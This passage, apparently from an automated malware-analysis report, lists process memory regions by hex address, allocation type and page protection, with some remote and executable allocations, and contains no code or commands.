page read and write
|
||
|
24C00000
|
trusted library allocation
|
page read and write
|
||
|
197C28F0000
|
heap
|
page read and write
|
||
|
24857000
|
trusted library allocation
|
page read and write
|
||
|
72D0000
|
direct allocation
|
page read and write
|
||
|
16CA5ED0000
|
trusted library allocation
|
page read and write
|
||
|
197C28C8000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
88E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
16CBD8B0000
|
heap
|
page execute and read and write
|
||
|
22707000
|
trusted library allocation
|
page read and write
|
||
|
197C09F7000
|
heap
|
page read and write
|
||
|
6D9F000
|
stack
|
page read and write
|
||
|
86D0000
|
trusted library allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
2470E000
|
stack
|
page read and write
|
||
|
7FFB4B280000
|
trusted library allocation
|
page execute and read and write
|
||
|
2492C000
|
stack
|
page read and write
|
||
|
7FFB4B0B2000
|
trusted library allocation
|
page read and write
|
||
|
20397325000
|
heap
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
16CA5150000
|
trusted library allocation
|
page read and write
|
||
|
16CBDA88000
|
heap
|
page read and write
|
||
|
203970D0000
|
heap
|
page read and write
|
||
|
197C0ADD000
|
heap
|
page read and write
|
||
|
7330000
|
heap
|
page execute and read and write
|
||
|
16CA50F0000
|
heap
|
page read and write
|
||
|
197C28F1000
|
heap
|
page read and write
|
||
|
8950000
|
heap
|
page read and write
|
||
|
4DDE000
|
stack
|
page read and write
|
||
|
4D10000
|
heap
|
page read and write
|
||
|
4E27000
|
remote allocation
|
page execute and read and write
|
||
|
7CE1DFF000
|
stack
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
24969000
|
stack
|
page read and write
|
||
|
16CA74FA000
|
trusted library allocation
|
page read and write
|
||
|
7630000
|
heap
|
page read and write
|
||
|
8BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
4E5F000
|
stack
|
page read and write
|
||
|
A3E000
|
unkown
|
page read and write
|
||
|
24850000
|
trusted library allocation
|
page read and write
|
||
|
24790000
|
trusted library allocation
|
page read and write
|
||
|
16CA6F88000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page read and write
|
||
|
24AD7000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
72B0000
|
direct allocation
|
page read and write
|
||
|
3099000
|
heap
|
page read and write
|
||
|
16CA5360000
|
heap
|
page execute and read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
4C3C000
|
stack
|
page read and write
|
||
|
197C28D7000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
197C29C9000
|
heap
|
page read and write
|
||
|
2223F000
|
stack
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
C93000
|
trusted library allocation
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
7CE1CFB000
|
stack
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
889D000
|
stack
|
page read and write
|
||
|
257E0000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
197C28C4000
|
heap
|
page read and write
|
||
|
221FE000
|
stack
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
52E9EBE000
|
stack
|
page read and write
|
||
|
25810000
|
trusted library allocation
|
page read and write
|
||
|
3350000
|
trusted library allocation
|
page read and write
|
||
|
2244F000
|
stack
|
page read and write
|
||
|
7FFB4B3C0000
|
trusted library allocation
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
86C7000
|
trusted library allocation
|
page read and write
|
||
|
7775000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
24AD9000
|
heap
|
page read and write
|
||
|
8BC0000
|
direct allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
16CA53F6000
|
trusted library allocation
|
page read and write
|
||
|
197C0A20000
|
heap
|
page read and write
|
||
|
226C0000
|
heap
|
page read and write
|
||
|
86E0000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
32F0000
|
trusted library section
|
page read and write
|
||
|
2497E000
|
trusted library allocation
|
page read and write
|
||
|
197C0A1F000
|
heap
|
page read and write
|
||
|
7FFB4B270000
|
trusted library allocation
|
page execute and read and write
|
||
|
197C29C9000
|
heap
|
page read and write
|
||
|
5E91000
|
trusted library allocation
|
page read and write
|
||
|
197C29FB000
|
heap
|
page read and write
|
||
|
16CA388B000
|
heap
|
page read and write
|
||
|
5F02000
|
trusted library allocation
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
16CA5210000
|
heap
|
page read and write
|
||
|
197C29C1000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
197C0AED000
|
heap
|
page read and write
|
||
|
249C0000
|
trusted library allocation
|
page read and write
|
||
|
16CA38AF000
|
heap
|
page read and write
|
||
|
CA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E97000
|
heap
|
page read and write
|
||
|
197C29CB000
|
heap
|
page read and write
|
||
|
24996000
|
trusted library allocation
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
2DFE000
|
stack
|
page read and write
|
||
|
7FFB4B292000
|
trusted library allocation
|
page read and write
|
||
|
16CA73AA000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
CAA000
|
trusted library allocation
|
page execute and read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
197C0DA0000
|
heap
|
page read and write
|
||
|
7980000
|
trusted library allocation
|
page read and write
|
||
|
7CE19FD000
|
stack
|
page read and write
|
||
|
197C0AE6000
|
heap
|
page read and write
|
||
|
16CA5597000
|
trusted library allocation
|
page read and write
|
||
|
2498E000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
4B7E000
|
stack
|
page read and write
|
||
|
197C0960000
|
heap
|
page read and write
|
||
|
8597000
|
stack
|
page read and write
|
||
|
16CA5F87000
|
trusted library allocation
|
page read and write
|
||
|
3380000
|
heap
|
page readonly
|
||
|
7FFB4B2A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
861D000
|
stack
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
16CA3700000
|
heap
|
page read and write
|
||
|
DA0000
|
heap
|
page readonly
|
||
|
52E987F000
|
stack
|
page read and write
|
||
|
4D5E000
|
stack
|
page read and write
|
||
|
546D4FF000
|
stack
|
page read and write
|
||
|
249B0000
|
heap
|
page execute and read and write
|
||
|
C84000
|
trusted library allocation
|
page read and write
|
||
|
16CA3845000
|
heap
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
52EA90E000
|
stack
|
page read and write
|
||
|
8660000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
197C0A19000
|
heap
|
page read and write
|
||
|
197C29CE000
|
heap
|
page read and write
|
||
|
24C40000
|
trusted library allocation
|
page read and write
|
||
|
24E4D000
|
stack
|
page read and write
|
||
|
224CB000
|
stack
|
page read and write
|
||
|
197C28E0000
|
heap
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
4FE8000
|
trusted library allocation
|
page read and write
|
||
|
7990000
|
trusted library allocation
|
page read and write
|
||
|
52E997E000
|
stack
|
page read and write
|
||
|
16CA3800000
|
heap
|
page read and write
|
||
|
24ADA000
|
heap
|
page read and write
|
||
|
24AE0000
|
heap
|
page read and write
|
||
|
197C29EC000
|
heap
|
page read and write
|
||
|
197C29D3000
|
heap
|
page read and write
|
||
|
197C28D3000
|
heap
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
197C0A2F000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
4427000
|
remote allocation
|
page execute and read and write
|
||
|
52E9BB7000
|
stack
|
page read and write
|
||
|
16CA58BF000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B420000
|
trusted library allocation
|
page read and write
|
||
|
24991000
|
trusted library allocation
|
page read and write
|
||
|
729B000
|
stack
|
page read and write
|
||
|
16CA7569000
|
trusted library allocation
|
page read and write
|
||
|
6C60000
|
direct allocation
|
page read and write
|
||
|
6C50000
|
direct allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
2D38000
|
stack
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
F0D000
|
stack
|
page read and write
|
||
|
16CA384D000
|
heap
|
page read and write
|
||
|
7FC30000
|
trusted library allocation
|
page execute and read and write
|
||
|
223B0000
|
remote allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
2497B000
|
trusted library allocation
|
page read and write
|
||
|
16CA589C000
|
trusted library allocation
|
page read and write
|
||
|
72A0000
|
direct allocation
|
page read and write
|
||
|
79FC000
|
stack
|
page read and write
|
||
|
20397330000
|
heap
|
page read and write
|
||
|
7FFB4B2F0000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
16CA6FE3000
|
trusted library allocation
|
page read and write
|
||
|
197C2A22000
|
heap
|
page read and write
|
||
|
3340000
|
trusted library allocation
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
7335000
|
heap
|
page execute and read and write
|
||
|
885C000
|
stack
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
248AE000
|
stack
|
page read and write
|
||
|
257F0000
|
trusted library allocation
|
page read and write
|
||
|
4260000
|
remote allocation
|
page execute and read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B3A0000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
7F120000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
24C30000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
197C0ABC000
|
heap
|
page read and write
|
||
|
197C0A1A000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
6CB0000
|
direct allocation
|
page read and write
|
||
|
2CFC000
|
stack
|
page read and write
|
||
|
8B71000
|
trusted library allocation
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
30CF000
|
stack
|
page read and write
|
||
|
4E1E000
|
stack
|
page read and write
|
||
|
24AE2000
|
heap
|
page read and write
|
||
|
2218C000
|
stack
|
page read and write
|
||
|
197C2922000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
7A7E000
|
stack
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
9547000
|
direct allocation
|
page execute and read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
16CA7564000
|
trusted library allocation
|
page read and write
|
||
|
7CE14FE000
|
stack
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
197C09F0000
|
heap
|
page read and write
|
||
|
24C00000
|
trusted library allocation
|
page read and write
|
||
|
7CE1BFF000
|
stack
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
86D9000
|
trusted library allocation
|
page read and write
|
||
|
85A0000
|
heap
|
page read and write
|
||
|
2D3D000
|
stack
|
page read and write
|
||
|
546D3FE000
|
unkown
|
page read and write
|
||
|
C70000
|
trusted library allocation
|
page read and write
|
||
|
8B80000
|
trusted library allocation
|
page read and write
|
||
|
8B2E000
|
stack
|
page read and write
|
||
|
24BE0000
|
trusted library allocation
|
page read and write
|
||
|
52E9B3E000
|
stack
|
page read and write
|
||
|
16CA5180000
|
trusted library allocation
|
page read and write
|
||
|
16CBD700000
|
heap
|
page execute and read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
197C28D3000
|
heap
|
page read and write
|
||
|
16CA51B0000
|
trusted library allocation
|
page read and write
|
||
|
197C29EC000
|
heap
|
page read and write
|
||
|
3355000
|
trusted library allocation
|
page execute and read and write
|
||
|
197C0ADF000
|
heap
|
page read and write
|
||
|
24C20000
|
trusted library allocation
|
page read and write
|
||
|
312D000
|
heap
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
52E9E3E000
|
stack
|
page read and write
|
||
|
7FFB4B0BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
85C0000
|
trusted library allocation
|
page read and write
|
||
|
2214D000
|
stack
|
page read and write
|
||
|
72E0000
|
direct allocation
|
page read and write
|
||
|
24C30000
|
trusted library allocation
|
page read and write
|
||
|
7300000
|
direct allocation
|
page read and write
|
||
|
3300000
|
trusted library section
|
page read and write
|
||
|
7FFB4B250000
|
trusted library allocation
|
page read and write
|
||
|
6D3E000
|
stack
|
page read and write
|
||
|
52E9F3B000
|
stack
|
page read and write
|
||
|
16CA3867000
|
heap
|
page read and write
|
||
|
6D50000
|
heap
|
page read and write
|
||
|
24C30000
|
trusted library allocation
|
page read and write
|
||
|
24BE0000
|
trusted library allocation
|
page read and write
|
||
|
16CA3820000
|
heap
|
page read and write
|
||
|
30DE000
|
stack
|
page read and write
|
||
|
16CA58A7000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B300000
|
trusted library allocation
|
page read and write
|
||
|
197C0ADD000
|
heap
|
page read and write
|
||
|
16CBDA48000
|
heap
|
page read and write
|
||
|
24710000
|
trusted library allocation
|
page read and write
|
||
|
226A9000
|
trusted library allocation
|
page read and write
|
||
|
76D000
|
stack
|
page read and write
|
||
|
7CE13FE000
|
stack
|
page read and write
|
||
|
24788000
|
stack
|
page read and write
|
||
|
88F8000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
6DA0000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B350000
|
trusted library allocation
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
197C29C4000
|
heap
|
page read and write
|
||
|
7FFB4B1D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
7A3E000
|
stack
|
page read and write
|
||
|
197C0ABD000
|
heap
|
page read and write
|
||
|
24E8F000
|
stack
|
page read and write
|
||
|
197C28F1000
|
heap
|
page read and write
|
||
|
52E99FE000
|
stack
|
page read and write
|
||
|
197C29C1000
|
heap
|
page read and write
|
||
|
197C0ABC000
|
heap
|
page read and write
|
||
|
6C80000
|
direct allocation
|
page read and write
|
||
|
24F51000
|
trusted library allocation
|
page read and write
|
||
|
16CA5D9D000
|
trusted library allocation
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page execute and read and write
|
||
|
CB7000
|
trusted library allocation
|
page execute and read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
2561C000
|
stack
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
24C10000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
52EAA0B000
|
stack
|
page read and write
|
||
|
7C0B000
|
stack
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
88F0000
|
heap
|
page read and write
|
||
|
223B0000
|
heap
|
page read and write
|
||
|
225AF000
|
stack
|
page read and write
|
||
|
F50000
|
direct allocation
|
page read and write
|
||
|
3339000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
52E9673000
|
stack
|
page read and write
|
||
|
197C0A2C000
|
heap
|
page read and write
|
||
|
16CA7589000
|
trusted library allocation
|
page read and write
|
||
|
222CF000
|
stack
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
57CA000
|
trusted library allocation
|
page read and write
|
||
|
7CE12F9000
|
stack
|
page read and write
|
||
|
16CA5A3E000
|
trusted library allocation
|
page read and write
|
||
|
7DF452D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7784000
|
heap
|
page read and write
|
||
|
6227000
|
remote allocation
|
page execute and read and write
|
||
|
25810000
|
trusted library allocation
|
page read and write
|
||
|
197C29FA000
|
heap
|
page read and write
|
||
|
2268C000
|
stack
|
page read and write
|
||
|
16CB567B000
|
trusted library allocation
|
page read and write
|
||
|
6E64000
|
heap
|
page read and write
|
||
|
197C29C6000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
197C28C1000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
24F0E000
|
stack
|
page read and write
|
||
|
197C0A26000
|
heap
|
page read and write
|
||
|
4BBF000
|
stack
|
page read and write
|
||
|
3352000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
249D0000
|
heap
|
page read and write
|
||
|
2579C000
|
stack
|
page read and write
|
||
|
7FFB4B3D0000
|
trusted library allocation
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
16CA5130000
|
trusted library allocation
|
page read and write
|
||
|
4E80000
|
heap
|
page execute and read and write
|
||
|
16CA758D000
|
trusted library allocation
|
page read and write
|
||
|
257E0000
|
trusted library allocation
|
page read and write
|
||
|
197C29FA000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
197C28D8000
|
heap
|
page read and write
|
||
|
16CA7324000
|
trusted library allocation
|
page read and write
|
||
|
3320000
|
trusted library allocation
|
page read and write
|
||
|
197C29C0000
|
heap
|
page read and write
|
||
|
197C28D3000
|
heap
|
page read and write
|
||
|
16CA7361000
|
trusted library allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
247A5000
|
trusted library allocation
|
page read and write
|
||
|
197C0A5F000
|
heap
|
page read and write
|
||
|
197C0A2E000
|
heap
|
page read and write
|
||
|
24F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DDC000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
780A000
|
heap
|
page read and write
|
||
|
16CA6F9E000
|
trusted library allocation
|
page read and write
|
||
|
22550000
|
trusted library allocation
|
page execute and read and write
|
||
|
223B0000
|
remote allocation
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
16CB565C000
|
trusted library allocation
|
page read and write
|
||
|
197C0ABC000
|
heap
|
page read and write
|
||
|
6CA0000
|
direct allocation
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
223B0000
|
remote allocation
|
page read and write
|
||
|
197C0A53000
|
heap
|
page read and write
|
||
|
2559C000
|
stack
|
page read and write
|
||
|
2234E000
|
stack
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
257DE000
|
stack
|
page read and write
|
||
|
24710000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
16CA5F7A000
|
trusted library allocation
|
page read and write
|
||
|
7CE16FF000
|
stack
|
page read and write
|
||
|
7CE17FE000
|
stack
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
24BE0000
|
trusted library allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
16CA60CE000
|
trusted library allocation
|
page read and write
|
||
|
197C2925000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
8770000
|
heap
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page read and write
|
||
|
197C28E7000
|
heap
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
16CA6AF3000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0B4000
|
trusted library allocation
|
page read and write
|
||
|
4E77000
|
trusted library allocation
|
page read and write
|
||
|
249A2000
|
trusted library allocation
|
page read and write
|
||
|
197C2922000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
16CA5AFC000
|
trusted library allocation
|
page read and write
|
||
|
24AE0000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
16CA5893000
|
trusted library allocation
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
16CA3916000
|
heap
|
page read and write
|
||
|
332D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B2D0000
|
trusted library allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
255DD000
|
stack
|
page read and write
|
||
|
CBB000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E14000
|
heap
|
page read and write
|
||
|
197C28EC000
|
heap
|
page read and write
|
||
|
4C7D000
|
stack
|
page read and write
|
||
|
24850000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
16CA5A1F000
|
trusted library allocation
|
page read and write
|
||
|
16CBDA09000
|
heap
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
16CBD76C000
|
heap
|
page read and write
|
||
|
52E98FD000
|
stack
|
page read and write
|
||
|
22775000
|
trusted library allocation
|
page read and write
|
||
|
2BDE000
|
stack
|
page read and write
|
||
|
7FFB4B330000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B10C000
|
trusted library allocation
|
page execute and read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
25820000
|
trusted library allocation
|
page read and write
|
||
|
4BC8000
|
trusted library allocation
|
page read and write
|
||
|
25770000
|
trusted library allocation
|
page read and write
|
||
|
16CA3869000
|
heap
|
page read and write
|
||
|
7FFB4B340000
|
trusted library allocation
|
page read and write
|
||
|
8976000
|
heap
|
page read and write
|
||
|
7860000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B390000
|
trusted library allocation
|
page read and write
|
||
|
197C28E4000
|
heap
|
page read and write
|
||
|
16CA5D99000
|
trusted library allocation
|
page read and write
|
||
|
23735000
|
trusted library allocation
|
page read and write
|
||
|
197C29EB000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
6E52000
|
heap
|
page read and write
|
||
|
6E0D000
|
heap
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0CB000
|
trusted library allocation
|
page read and write
|
||
|
72F0000
|
direct allocation
|
page read and write
|
||
|
16CA75A0000
|
trusted library allocation
|
page read and write
|
||
|
2B9D000
|
stack
|
page read and write
|
||
|
2474A000
|
stack
|
page read and write
|
||
|
16CBD8D0000
|
heap
|
page read and write
|
||
|
C90000
|
trusted library allocation
|
page read and write
|
||
|
16CBDA0D000
|
heap
|
page read and write
|
||
|
24AD5000
|
heap
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
C80000
|
trusted library allocation
|
page read and write
|
||
|
24BE0000
|
trusted library allocation
|
page read and write
|
||
|
197C28F1000
|
heap
|
page read and write
|
||
|
257F0000
|
trusted library allocation
|
page read and write
|
||
|
4E70000
|
trusted library allocation
|
page read and write
|
||
|
52E9AF9000
|
stack
|
page read and write
|
||
|
197C0AD4000
|
heap
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
22560000
|
heap
|
page read and write
|
||
|
7FFB4B26A000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
16CA38B1000
|
heap
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
16CBD8F1000
|
heap
|
page read and write
|
||
|
24BF0000
|
heap
|
page read and write
|
||
|
257F0000
|
trusted library allocation
|
page read and write
|
||
|
197C2A20000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
197C29FA000
|
heap
|
page read and write
|
||
|
865E000
|
stack
|
page read and write
|
||
|
22480000
|
direct allocation
|
page read and write
|
||
|
52E9C37000
|
stack
|
page read and write
|
||
|
6DFF000
|
heap
|
page read and write
|
||
|
8C60000
|
direct allocation
|
page read and write
|
||
|
16CA5F2C000
|
trusted library allocation
|
page read and write
|
||
|
197C28F1000
|
heap
|
page read and write
|
||
|
52E9A7E000
|
stack
|
page read and write
|
||
|
7FFB4B0D0000
|
trusted library allocation
|
page read and write
|
||
|
16CA60F3000
|
trusted library allocation
|
page read and write
|
||
|
24C30000
|
trusted library allocation
|
page read and write
|
||
|
197C0AEB000
|
heap
|
page read and write
|
||
|
197C0950000
|
heap
|
page read and write
|
||
|
16CA5371000
|
trusted library allocation
|
page read and write
|
||
|
52E97FE000
|
stack
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
7730000
|
heap
|
page read and write
|
||
|
7FFB4B2E0000
|
trusted library allocation
|
page read and write
|
||
|
16CA5227000
|
heap
|
page read and write
|
||
|
4C80000
|
trusted library allocation
|
page read and write
|
||
|
16CBD710000
|
heap
|
page read and write
|
||
|
CC0000
|
heap
|
page execute and read and write
|
||
|
16CBD792000
|
heap
|
page read and write
|
||
|
2228E000
|
stack
|
page read and write
|
||
|
8C90000
|
direct allocation
|
page read and write
|
||
|
16CA3871000
|
heap
|
page read and write
|
||
|
16CBD9F9000
|
heap
|
page read and write
|
||
|
7FFB4B360000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
8C70000
|
direct allocation
|
page read and write
|
||
|
9380000
|
direct allocation
|
page execute and read and write
|
||
|
ECE000
|
stack
|
page read and write
|
||
|
725D000
|
stack
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
16CA382E000
|
heap
|
page read and write
|
||
|
8C80000
|
direct allocation
|
page read and write
|
||
|
16CA734D000
|
trusted library allocation
|
page read and write
|
||
|
8919000
|
heap
|
page read and write
|
||
|
F60000
|
direct allocation
|
page read and write
|
||
|
226A0000
|
trusted library allocation
|
page read and write
|
||
|
7811000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
16CBDAB0000
|
heap
|
page read and write
|
||
|
24BF0000
|
trusted library allocation
|
page read and write
|
||
|
24AD0000
|
heap
|
page read and write
|
||
|
2569D000
|
stack
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
546D2FD000
|
stack
|
page read and write
|
||
|
3153000
|
heap
|
page read and write
|
||
|
197C0DA5000
|
heap
|
page read and write
|
||
|
6DE3000
|
heap
|
page read and write
|
||
|
2240E000
|
stack
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
24BD0000
|
trusted library allocation
|
page read and write
|
||
|
DB5000
|
heap
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B400000
|
trusted library allocation
|
page read and write
|
||
|
24D90000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
197C0AD4000
|
heap
|
page read and write
|
||
|
197C2A28000
|
heap
|
page read and write
|
||
|
6C70000
|
direct allocation
|
page read and write
|
||
|
16CA386F000
|
heap
|
page read and write
|
||
|
16CA60E6000
|
trusted library allocation
|
page read and write
|
||
|
256DE000
|
stack
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
16CBD9E0000
|
heap
|
page read and write
|
||
|
315F000
|
heap
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
16CA5215000
|
heap
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
24F50000
|
trusted library allocation
|
page read and write
|
||
|
197C2927000
|
heap
|
page read and write
|
||
|
D7D000
|
stack
|
